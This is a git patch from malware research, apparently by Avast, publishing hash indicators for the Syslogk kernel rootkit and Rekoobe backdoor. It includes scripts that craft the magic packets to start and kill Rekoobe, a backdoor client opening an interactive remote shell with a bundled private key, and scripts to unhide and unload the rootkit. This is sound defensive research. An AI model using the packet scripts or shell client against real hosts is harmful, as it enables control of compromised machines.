From 0e673de28789d2e367f22c58b872080eb5945a9d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?David=20=C3=81lvarez?= <david.alvarez@avast.com>
Date: Mon, 13 Jun 2022 08:48:05 +0200
Subject: [PATCH] Syslogk Rootkit

---
 SyslogkRootkit/README.md                      | 91 +++++++++++++++++++
 SyslogkRootkit/Research Tools/cert.pem        | 48 ++++++++++
 .../magic_packet_kill_rekoobe.py              | 29 ++++++
 .../magic_packet_start_rekoobe.py             | 26 ++++++
 .../Research Tools/rekoobe_backdoor_client.py | 39 ++++++++
 .../remove_syslogk_from_memory.sh             |  3 +
 .../Research Tools/unhide_rootkit.c           | 14 +++
 SyslogkRootkit/samples.md5                    | 71 +++++++++++++++
 SyslogkRootkit/samples.sha1                   | 71 +++++++++++++++
 SyslogkRootkit/samples.sha256                 | 71 +++++++++++++++
 10 files changed, 463 insertions(+)
 create mode 100644 SyslogkRootkit/README.md
 create mode 100644 SyslogkRootkit/Research Tools/cert.pem
 create mode 100644 SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py
 create mode 100644 SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py
 create mode 100644 SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py
 create mode 100644 SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh
 create mode 100644 SyslogkRootkit/Research Tools/unhide_rootkit.c
 create mode 100644 SyslogkRootkit/samples.md5
 create mode 100644 SyslogkRootkit/samples.sha1
 create mode 100644 SyslogkRootkit/samples.sha256

diff --git a/SyslogkRootkit/README.md b/SyslogkRootkit/README.md
new file mode 100644
index 0000000..a77aca7
--- /dev/null
+++ b/SyslogkRootkit/README.md
@@ -0,0 +1,91 @@
+# IoC for Syslogk Kernel Rootkit hiding Rekoobe
+
+### Table of Contents
+* [IoCs](#IoCs)
+* [Source Code of our research tools](#Source-Code-of-our-research-tools)
+
+## Samples (SHA-256)
+#### IoCs
+```
+68FACAC60EE0ADE1AA8F8F2024787244C2584A1A03D10CDA83EEAF1258B371F2
+11EDF80F2918DA818F3862246206B569D5DCEBDC2A7ED791663CA3254EDE772D
+FA94282E34901EBA45720C4F89A0C820D32840AE49E53DE8E75B2D6E78326074
+FD92E34675E5B0B8BFBC6B1F3A00A7652E67A162F1EA612F6E86CCA846DF76C5
+12C1B1E48EFFE60EEF7486B3AE3E458DA403CD04C88C88FAB7FCA84D849EE3F5
+06778BDDD457AAFBC93D384F96EAD3EB8476DC1BC8A6FBD0CD7A4D3337DDCE1E
+F1A592208723A66FA51CE1BC35CBD6864E24011C6DC3BCD056346428E4E1C55D
+55DBDB84C40D9DC8C5AAF83226CA00A3395292CC8F884BDC523A44C2FD431C7B
+DF90558A84CFCF80639F32B31AEC187B813DF556E3C155A05AF91DEDFD2D7429
+160CFB90B81F369F5BA929ABA0B3130CB38D3C90D629FE91B31FDEF176752421
+B4D0F0D652F907E4E77A9453DCCE7810B75E1DC5867DEB69BEA1E4ECDD02D877
+3A6F339DF95E138A436A4FEFF64DF312975A262FA16B75117521B7D6E7115D65
+74699B0964A2CBDC2BC2D9CA0B2B6F5828B638DE7C73B1D41E7FE26CFC2F3441
+7A599FF4A58CB0672A1B5E912A57FCDC4B0E2445EC9BC653F7F3E7A7D1DC627F
+F4E3CFEEB4E10F61049A88527321AF8C77D95349CAF616E86D7FF4F5BA203E5F
+31330C0409337592E9DE7AC981CECB7F37CE0235F96E459FEFBD585E35C11A1A
+C6D735B7A4656A52F3CD1D24265E4F2A91652F1A775877129B322114C9547DEB
+2E81517EE4172C43A2084BE1D584841704B3F602CAFC2365DE3BCB3D899E4FB8
+B22F55E476209ADB43929077BE83481EBDA7E804D117D77266B186665E4B1845
+A93B9333A203E7EED197D0603E78413013BD5D8132109BBEF5EF93B36B83957C
+870D6C202FCC72088FF5D8E71CC0990777A7621851DF10BA74D0E07D19174887
+CA2EE3F30E1C997CC9D8E8F13EC94134CDB378C4EB03232F5ED1DF74C0A0A1F0
+9D2E25EC0208A55FBA97AC70B23D3D3753E9B906B4546D1B14D8C92F8D8EB03D
+29058D4CEE84565335EAFDF2D4A239AFC0A73F1B89D3C2149346A4C6F10F3962
+7E0B340815351DAB035B28B16CA66A2C1C7EAF22EDF9EAD73D2276FE7D92BAB4
+AF9A19F99E0DCD82A31E0C8FC68E89D104EF2039B7288A203F6D2E4F63AE4D5C
+6F27DE574AD79EB24D93BEB00E29496D8CFE22529FC8EE5010A820F3865336A9
+D690D471B513C5D40CAEF9F1E37C94DB20E6492B34EA6A3CDDCC22058F842CF3
+E08E241D6823EFEDF81D141CC8FD5587E13DF08AEDA9E1793F754871521DA226
+DA641F86F81F6333F2730795DE93AD2A25AB279A527B8B9E9122B934A730AB08
+E3D64A128E9267640F8FC3E6BA5399F75F6F0ACA6A8DB48BF989FE67A7EE1A71
+D3E2E002574FB810AC5E456F122C30F232C5899534019D28E0E6822E426ED9D3
+7B88FA41D6A03AEDA120627D3363B739A30FE00008CE8D848C2CBB5B4473D8BC
+50B73742726B0B7E00856E288E758412C74371EA2F0EAF75B957D73DFB396FD7
+8B036E5E96AB980DF3DCA44390D6F447D4CA662A7EDDAC9F52D172EFFF4C58F8
+8B18C1336770FCDDC6FE78D9220386BCE565F98CC8ADA5A90CE69CE3DDF36043
+F04DC3C62B305CDB4D83D8DF2CAA2D37FEEB0A86FB5A745DF416BAC62A3B9731
+72F200E3444BB4E81E58112111482E8175610DC45C6E0C6DCD1D2251BACF7897
+D129481955F24430247D6CC4AF975E4571B5AF7C16E36814371575BE07E72299
+6FC03C92DEE363DD88E50E89062DD8A22FE88998AFF7DE723594EC916C348D0A
+FCA2EA3E471A0D612CE50ABC8738085F076AD022F70F78C3F8C83D1B2FF7896B
+2FEA3BC88C8142FA299A4AD9169F8879FC76726C71E4B3E06A04D568086D3470
+178B23E7EDED2A671FA396DD0BAC5D790BCA77EC4B2CF4B464D76509ED12C51A
+3BFF2C5BFC24FC99D925126EC6BEB95D395A85BC736A395AAF4719C301CBBFD4
+14A33415E95D104CF5CF1ACAFF9586F78F7EC3FFB26EFD0683C468EDEAF98FD7
+8BB7842991AFE86B97DEF19F226CB7E0A9F9527A75981F5E24A70444A7299809
+020A6B7EDCFF7764F2AAC1860142775EDEF1BC057BEDD49B575477105267FC67
+6711D5D42B54E2D261BB48AA7997FA9191AEC059FD081C6F6E496D8DB17A372A
+48671BC6DBC786940EDE3A83CC18C2D124D595A47FB20BC40D47EC9D5E8B85DC
+B0D69E260A44054999BAA348748CF4B2D1EAAB3DD3385BB6AD5931FF47A920DE
+E1999A3E5A611312E16BB65BB5A880DFEDBAB8D4D2C0A5D3ED1ED926A3F63E94
+FA0EA232AB160A652FCBD8D6DB8FFA09FD64BCB3228F000434D6A8E340AAF4CB
+11EDF80F2918DA818F3862246206B569D5DCEBDC2A7ED791663CA3254EDE772D
+73BBABC65F884F89653A156E432788B5541A169036D364C2D769F6053960351F
+8EC87DEE13DE3281D55F7D1D3B48115A0F5E4A41BFBEF1EA08E496AC529829C8
+8285EE3115E8C71C24CA3BDCE313D3CFADEAD283C31A116180D4C2611EFB610D
+958BCE41371B68706FEAE0F929A18FA84D4A8A199262C2110A7C1C12D2B1DCE2
+38F357C32F2C5A5E56EA40592E339BAC3B0CABD6A903072B9D35093A2ED1CB75
+BCC3D47940AE280C63B229D21C50D25128B2A15EA42FE8572026F88F32ED0628
+08A1273AC9D6476E9A9B356B261FDC17352401065E2FC2AD3739E3F82E68705A
+CF525918CB648C81543D9603AC75BC63332627D0EC070C355A86E3595986CBB3
+42BC744B22173FF12477E57F85FA58450933E1C4294023334B54373F6F63EE42
+337674D6349C21D3C66A4245C82CB454FEA1C4E9C9D6E3578634804793E3A6D6
+4EFFA5035FE6BBAFD283FFAE544A5E4353EB568770421738B4B0BB835DAD573B
+5B8059EA30C8665D2C36DA024A170B31689C4671374B5B9B1A93C7CA47477448
+BD07A4CCC8FA67E2E80B9C308DEC140CA1AE9C027FA03F2828E4B5BDBA6C7391
+BF09A1A7896E05B18C033D2D62F70EA4CAC85E2D72DBD8869E12B61571C0327E
+79916343B93A5A7AC7B7133A26B77B8D7D0471B3204EAE78A8E8091BFE19DC8C
+C32E559568D2F6960BC41CA0560AC8F459947E170339811804011802D2F87D69
+864C261555FCE40D022A68D0B0EADB7AB69DA6AF52AF081FD1D9E3ECED4AEE46
+275D63587F3AC511D7CCA5FF85AF2914E74D8B68EDD5A7A8A1609426D5B7F6A9
+031183E9450AD8283486621C4CDC556E1025127971C15053A3BF202C132FE8F9
+```
+## Source Code of our research tools
+```
+unhide_rootkit.c
+remove_syslogk_from_memory.sh
+magic_packet_start_rekoobe.py
+magic_packet_kill_rekoobe.py
+rekoobe_backdoor_client.py
+cert.pem
+```
diff --git a/SyslogkRootkit/Research Tools/cert.pem b/SyslogkRootkit/Research Tools/cert.pem
new file mode 100644
index 0000000..08a8745
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/cert.pem	
@@ -0,0 +1,48 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAtlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSM
+NZ2GTNOKmKsuF8AIbzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7Q
+OPl0BI7wi2kmZNrXshKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4
+yTmVaf9v2Ll2JUnhP3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp
+0BX5MVVW4vPxXxhZpdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/
+wBEGzmNTzLcjiwRkuzSx7gQsDCvUC/+Lc/nFxwIDAQABAoIBAB24xiWiiQG7Ekca
+1XzHmV26wLuxsXf/xlcjqxlOl/o9+WZPBzNt+4fmKv77V8XzPOyzeBB4CLNdZnDp
+xxP9wHN3fxazX9786yAJUn/s2wA6Cg9oQrQmpKxhh/+RIfrqWKHjud0IgAOkE+uM
+UFgeskZYb72NYyLMjV1ZxDr3KbinWDqVUS7R/7QdsJH4c+rs9ML+l/2LOgJp8XBN
+3LM9XEuX/conJBWm+cszHwB+QtacIrgKd/RPIfcOBTXsm3dl1Ai0aXCG8dmarFaa
+iziIpz9CvuvqMfs0Gbyqjgff45F2oxHuv0SO9SLcgw/iExfoELodydUoqffl+WRN
+CSFvXHECgYEA3iHHdv+qXJYJgIi/wotNi7T1+r00WkCGAtDxLWA25mIlCbddLck8
+zp/Q37Z49Pt96O5xVzsSPjQIhUkOXb26IlGNpddRZbWCcHAiG0YpagiFfAuqlqYG
+9bds9rfpSG6iSb8d1cF3YFNJKAyX/z3MtF0jwJbJ0tfBWCpzDHdALQ0CgYEA0idr
+5d07FyExNYojpNqHJm0JC4JpJd5eFz22wuA3+7+X0Ce8Qu7X3sDvJXu094YVFQkR
+BNTI6ZLw+fXhhGNcsinzJYfKDGmXMNiH+OdqyozzysiqCf83rZ204I47Q4pocdYi
+upVWjdk/UcAYKxu5kSjyOFoXhgHBEIJAZSQc0SMCgYA+6TA1yqj0OeYNCi3NKmjW
+9XRpBCcMnJOXvpdfs4046Hj27ICuU/0tw+ODSImvUH7TdpyRCQDcrx3uqccw02gh
+Chnk6zt5Y9PChm+Sa+eUyT8M57zzl6gG9WEd6u5d/j9mRYNso7Nsi4n/lrmBp34P
+YwWaKNqWJVbz4mndEPUTDQKBgFkSLlAp2T6vacz4dK0NlhS6SAghyPEs85JELO8h
+23iPNwgZn1h7JPGbsoCfkw8KPGtDAXybt2AQUKSRC3lyJ7q3vv+cMw3ZvyQL0m2z
+n/ajkTzUmgVMr8udOSmn/wRcaHI/QU71ts6+UnESyuuSf68/vJIX1TqOCcc2fZag
+nLojAoGAJdKPzWeIpV86OhMAHY4cU7wKVs25dHtzT067z/Jh6Of2BQG1Q6qUd5mb
+JBwXFjWEECMXf9aaVdx+TLIuAE0dvYBTUHRPE+BomKVRx0+heESDeX0Y3H3rb3Xg
+SqRTtAdcSLNrZIw1MPQF+VeOLjI0BiuRS0aqsIn+7hqqvG42mUA=
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDZTCCAk0CFGea+DeQMw739YWJuj8NI38FvCzLMA0GCSqGSIb3DQEBCwUAMG8x
+CzAJBgNVBAYTAkFVMQ0wCwYDVQQIDARuYW1lMQ0wCwYDVQQHDARjaXR5MSEwHwYD
+VQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxEDAOBgNVBAsMB3NlY3Rpb24x
+DTALBgNVBAMMBG5hbWUwHhcNMTgxMTE5MTg0OTA2WhcNMTkxMTE5MTg0OTA2WjBv
+MQswCQYDVQQGEwJBVTENMAsGA1UECAwEbmFtZTENMAsGA1UEBwwEY2l0eTEhMB8G
+A1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMRAwDgYDVQQLDAdzZWN0aW9u
+MQ0wCwYDVQQDDARuYW1lMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
+tlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSMNZ2GTNOKmKsuF8AI
+bzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7QOPl0BI7wi2kmZNrX
+shKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4yTmVaf9v2Ll2JUnh
+P3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp0BX5MVVW4vPxXxhZ
+pdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/wBEGzmNTzLcjiwRk
+uzSx7gQsDCvUC/+Lc/nFxwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCPHTnCCOzh
+dkc19fLU327wAYvoRi6T73Ik3wxI+A2U6ATo8qY6dZEvynmhBxhkhYahrfYRYYYB
+1fbbYqKYfBR1Hcr/Q4q0J/wyCwG7ZejvkgFHILUEBb9is7obBudAryZDBpRyNK6a
+k8aotUnH4bDlyLC6lUQlapzihr3WE5mGzjnVIH2YCN4ooyshkQi6wGvHJ2QudQBB
+2qwN6dJbZbtj8j9tFPCojKGQlW8wnLxRoim2188z+DTW6Wb+I3/bWI12uP9YhQ7L
+kBHt495ClCqUsrVSUjcgttazGWvcM2ms/UrUoNdbhKsDzx1rvpDdb5sz6170Zg7z
+7ikRaS9ULzzm
+-----END CERTIFICATE-----
diff --git a/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py
new file mode 100644
index 0000000..161fc7e
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py	
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Syslogk magic packet for killing Rekoobe
+   (it requires knowing the key 'D9sd87JMaij' and also matching some fields
+   of the magic packet used for starting Rekoobe)
+"""
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+
+ip_header  = b'\x45\x00\xB3\xF7'  # Version, IHL, Type of Service | Total Length
+ip_header += b'\xb6\xe7\x00\x00'  # Identification | Flags, Fragment Offset
+ip_header += b'\x40\x06\xa6\xec'  # TTL, Protocol | Header Checksum
+ip_header += b'\x0a\x00\x02\x0E'  # Source Address
+ip_header += b'\x0a\x00\x02\x0F'  # Destination Address
+
+tcp_header  = b'\xF7\xA9\x00\x00' # Source Port | Destination Port
+tcp_header += b'\x00\x00\x00\x00' # Sequence Number
+tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number
+tcp_header += b'\x50\x08\x71\x10' # Data Offset, Reserved, Flags | Window Size
+tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer
+
+data = b"jiaMJ78ds9D"[::-1]
+
+packet = ip_header + tcp_header + data
+s.sendto(packet, ('10.0.2.15', 1))
diff --git a/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py
new file mode 100644
index 0000000..30313b8
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py	
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Syslogk magic packet for starting Rekoobe
+   (it first kills all running instances of Rekoobe)
+"""
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+
+ip_header  = b'\x45\x00\xB3\xF7'  # Version, IHL, Type of Service | Total Length
+ip_header += b'\xb6\xe7\x00\x00'  # Identification | Flags, Fragment Offset
+ip_header += b'\x40\x06\xa6\xec'  # TTL, Protocol | Header Checksum
+ip_header += b'\x0a\x00\x02\x0E'  # Source Address
+ip_header += b'\x0a\x00\x02\x0F'  # Destination Address
+
+tcp_header  = b'\xB6\xE7\x00\x00' # Source Port | Destination Port
+tcp_header += b'\x00\x00\x00\x00' # Sequence Number
+tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number
+tcp_header += b'\x50\x02\x71\x10' # Data Offset, Reserved, Flags | Window Size
+tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer
+
+packet = ip_header + tcp_header
+s.sendto(packet, ('10.0.2.15', 1))
diff --git a/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py
new file mode 100644
index 0000000..06d07d8
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py	
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Rekoobe backdoor client
+"""
+
+import socket
+import ssl
+
+HOST = "127.0.0.1"
+PORT = 45681
+client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+
+if __name__ == "__main__":
+    client.connect((HOST, PORT))
+    print(client.recv(200))
+    client.send("\r\n")
+    print(client.recv(200))
+    client.send("starttls\r\n")
+    print(client.recv(200))
+    ssl_client = ssl.wrap_socket(client, certfile="./cert.pem")
+    ssl_client.send(b"\x03")
+    ssl_client.send(b"%")
+    ssl_client.send(b"0002")
+    ssl_client.send(b"\r\n")
+    ssl_client.settimeout(1)
+    ssl_client.recv()
+    while True:
+        command = raw_input("Shell>")
+        command += "\r\n"
+        command = command.encode()
+        ssl_client.send(command)
+        try:
+            # Receiving stdin, stdout, stderr
+            while True:
+                print(ssl_client.recv())
+        except ssl.SSLError:
+            pass
diff --git a/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh
new file mode 100644
index 0000000..cdc25a5
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh	
@@ -0,0 +1,3 @@
+#!/bin/bash
+echo 1>/proc/syslogk
+rmmod syslogk
diff --git a/SyslogkRootkit/Research Tools/unhide_rootkit.c b/SyslogkRootkit/Research Tools/unhide_rootkit.c
new file mode 100644
index 0000000..d1ad6db
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/unhide_rootkit.c	
@@ -0,0 +1,14 @@
+// It unhides the Syslog Rootkit
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+ 
+void main(void)
+{
+	int fd = open("/proc/syslogk", O_WRONLY);
+	lseek(fd, 0 , SEEK_SET);
+	write(fd, "1", 1); // Command for unhiding the module
+	close(fd);
+}
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.md5 b/SyslogkRootkit/samples.md5
new file mode 100644
index 0000000..8ea1b61
--- /dev/null
+++ b/SyslogkRootkit/samples.md5
@@ -0,0 +1,71 @@
+43d49693658a2ee2f1a31f780a2a8994
+358b58523b59d87f2831011f9e441362
+1eb9864a6d939dd7b882ac801165ac18
+f38fb09982cf301df17709b3adc085c2
+a874271e10b9c094f72fca6566d947fe
+69fc4610667464b37edb750cde2f5783
+5f2e72ff741c4544f66fec16101aeaf0
+75f9dd103dd05ca263af33c46f3f808d
+b1b1c04eba3668713a8c09b2d2178ace
+0a35e06f53c17ab1c8e18e7e0c0821d8
+1130c613a858b07234bf93663f5341eb
+24b411d2407527c7a58317c6758dca09
+1594d98385fe1682363c7ff2e9e8eba2
+e6bad14fff4f94705a2d8a628799025d
+a0dfa397428321fbd689464053c05da0
+e1cff1d865dd4a59d1245ebcec5f6768
+bf71b7b65a2b505a5c54855bcc8dd0ba
+35743db3dc333245ef5b69100721ced9
+81627048b6aea0c94256a1aaf8da617d
+eec8680ebb6926b75829acec93bb484d
+fda1948b62267383471adf0bb5fdb733
+95833f73123a94f01243339c21e62903
+ab811a9e4cc9fe3dfddff5f6635b599b
+0086f56a8e688586f5404dae991228e8
+b5cc891b885d9175da892a2ef932fdfc
+cb093453576184d1a2f59063dafa7f80
+22402bb153e035a7c94cea13d46e2e11
+d35657a79c7e0d3ab1fe589f5e8088a1
+c06dd1fe1944e4ddfca52c61d27f5f95
+0cda4f097a9b072f4dd8bf3ac6cf273a
+1ab35838f3e9bb899d385c6554883243
+791dd369c4acf8603a05de1e1dc53e64
+70334968d03654eb1c274eed997c0c3d
+edf7237aa215ce189647a0e231555df0
+22d3bac34718c93966c43390ac7e180d
+dd550a0210d9dd4062af1cd8b4acf218
+9122641b443f1fb82518e28c1c23cace
+d9f00f71efabdfcca7c63d4b0805673c
+1a6b53d9c8d093e5a6c988839fa7b4a0
+6a57986bfcc309556c4ca4168dbe86f2
+68cc213e17cf9acb84460085b1b7514d
+97db3f7676380f0baa3840ed5d5c1767
+d38ab3af331c2ce3d2df3a20e4d549ef
+bbca59926c8639a0cf8469cbed8303e8
+d8e9f6bf6c0c5bcd5de9f338da3c76a9
+1d37c331d8c67291ce56e0f4c45604b8
+64b26d72396de5892fd4ceca6b32511b
+6d91b9aa0139498dc99f50c3529c4468
+4235eba1cfd789d8d66ee782db848fed
+a131408c6be036fa3e94585dca7fddf1
+95cffe67742da99a7dc35ffc9fbde026
+901a242517aa71c0768500f81f9a3ad3
+85accdf83bd768a765fc4d0ca8c6105e
+d1fb3820d0911e155a330189dbb754ed
+c4a9d1873454347ad26921cdd83d9870
+32d8f6ee0c9e5971b0fb6bef53e91d75
+de79f0a71a56161c3405445a25e2c825
+635497c5fd2c58db380ad689d9084ff5
+5e59d6f7442b7d979dbba9dbbe565efc
+d75ecc784b27c06d3d56c28f6560ec41
+355358a22b6f1d9e122c2ff830b2849b
+492386efefa9ff716b6f0fe4ff46d796
+4640805c362b1e5bee5312514dd0ab2b
+97fca49a88af844cfecbb99ae692b4a8
+8dc647c9bc7d9594dee48092e9ee5f64
+ae8ecedb8fcebf7fc48c8fea8f63180e
+c4b4cb5395a1ee59a00536a0b17a7c28
+7c30c520bb000220e60e2a6dbec20356
+fecc8bbfbb379d271a2fefbecb7788d1
+14329d09c4ae1156b61ff683127ee1c9
+cabb1200867e788e21ab6966c3914d05
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.sha1 b/SyslogkRootkit/samples.sha1
new file mode 100644
index 0000000..7501265
--- /dev/null
+++ b/SyslogkRootkit/samples.sha1
@@ -0,0 +1,71 @@
+fe0441fa2c511a80a5d50330204126ae5739af49
+bb53fdf418635beab2112412ed0b1bed6d40f0d4
+9e3112b859954bcbe6a4e32e1a1eee3fb491df54
+ef07da968cdfed7b1e9745a360536bf9d3a9dde8
+2c014fdc8a3298fe073ef95f14ca594c85c70006
+60024cf6fa9adeb384e56367a3a7a7514788d806
+f733802a106f1a2a4249f1605522cdd436110109
+7a8cc29b82415463ea025436e643115fc1ee4147
+98dcd7ac8cc2cbfefd644d5decb34e7002cf1323
+14fd16e6465b74c5ac4dc895f4c15bccb447af31
+b0f74062405a161453621cb1ce4daa6ca09db960
+f85e3ef06c8b5cf8805a4df2560338f007cf3dd7
+61efc60e94cd630f181e8a0f895933cf52c92916
+d4b855b2c9db3fdb34182d00b9a0a455086b8e50
+872f08ee076ddda7d172f9d96f61d1d68662b036
+0bcf6a9ed93c45c2865f3961079d207479be611a
+a443b0f3561d4bd8e40b5daed3f6915a5e03e6c2
+fa681933eccc1b3cae4cce6ab6f16db08c2f2a87
+3e2b3ab9e85f4a15a03f59ac4b288119658b24b6
+bb37e133d6901659c4b61a53082a3e6c83ff180a
+1ae878306e1732402d949e2ce91ab7b0bdf9f5b9
+55aa4d1541d8a76471a7e06083389a3547ec0472
+cbe804bc2ce4a20281d33f1af5d99931e2162ff7
+cb93c60496e3862afbd1647ceee19ce970aea88f
+ab7df4d4b0734a7c30997940af3b54debb1006ae
+2f19ff48fd8ff94557d44c7417ec10069cd158e9
+bfeb14b982fa9a01f01fd2e03be4ca5e92849040
+394624cfe12d4d58a91c691b154b61206eb19f1f
+f52f35b8cc98b7fa1a19c6cc8371ccd163a7c624
+d3c4bd3ba3775af039bd30e47ca43ff6ca285297
+f909794ab799ea535e96611a12ed8cb872584390
+0cae8afef7e715019ef969b83bc1e4d3a2d531c7
+2e470d8b81fdea77d79af68519509aa136edf67e
+80ba296be9ba1f945500bd468026157fad4f7fb8
+11315b4e597672362212a4bbccbb504e41e6c349
+95495c01db77576c1fb14a96efa7fe2132f3ae7f
+7b190757efdd470fca4127948c6297d53adf3958
+49c4aa2812535884bd9d3a564e7656dec150933a
+9b2c0690e12a27433e0307af22588213dffe639a
+d76a1fe4733ab0453ae95abecb82f252da449f83
+33c35312b2b57686da695ed0b2a63bb14d28e2be
+4fe8efef8c2e7cc3bafee19da8b223daae2242a1
+afa7e2753f78322467b8ac6bcdcb3b7f33c9864f
+88233293c1d0d64e05d29ae5f006ff8094006374
+732e62bec281943aa49fe679bf9f676ad0e36b8b
+e050ae9bbb0029d4c6045661f4b3ae829bd74c39
+b0ee6f6e202fa708ab4fcae61f8bd4d236ee7d95
+c01aa4e298aad696b52dae8e498505aa099208a5
+95494d0ce800f2973dc9397c4e7d14762c90404c
+ec15bcb9a62cdac24637ad90439d1c6227eaff25
+7f261bffdc4822b471a3719a91dfbf61098cfe4b
+165f63816292da06299863cf7643d5798dd30e95
+cddd58e820acbbc3d3237c7a8bec665255c90a38
+ecda0bdc7f34871787215929bcf500bef8be099d
+fd2143c6088044176647e44bd8acf909eb3fed0f
+01f004d40305c194a1063d47c46bb3787ab84a1d
+7c9290587d0954dfa6b19fb4ae3b7bfe30d046b2
+28457abeb8af2b882f226397ed4e383b6f74fbb4
+752e5c2ed95cc518582c069cf0b9ad477899463a
+8d4f1d20c0b55c4c22971837482b0b8a5e93480a
+b19c1696b032805014f9cc289caf45e346936583
+845160c24a9177eaf02f5800bc5876508b3b8960
+f743a235ebed3f1757074acbef2f0c8b2d3f833a
+53abaef53d6b87e16df254b5d2a7886ba4af0be9
+00af7dcd02ebe1ea97dde77df7ef90cecd6e33db
+6cf5541546dff30bdb8c5203766ec0826d70d214
+6256a050210bf8075eebf1c3ebdea36ea22bcd13
+b818ecefd6dc92e51a6ba232bfa562b5c4c2c31c
+275ae290639984f11f43da603acc7faa7deaa564
+63e717d1caa3d0a4436ade9b263a0622dcdb8838
+63588250c49b06aaecc854fe59b17b3f9b5bfeff
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.sha256 b/SyslogkRootkit/samples.sha256
new file mode 100644
index 0000000..7b3793d
--- /dev/null
+++ b/SyslogkRootkit/samples.sha256
@@ -0,0 +1,71 @@
+020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67
+031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9
+06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e
+08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a
+11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d
+12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5
+14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7
+160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421
+178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a
+275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9
+29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962
+2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8
+2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470
+31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a
+337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6
+38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75
+3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65
+3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4
+42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42
+48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc
+4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b
+50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7
+55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b
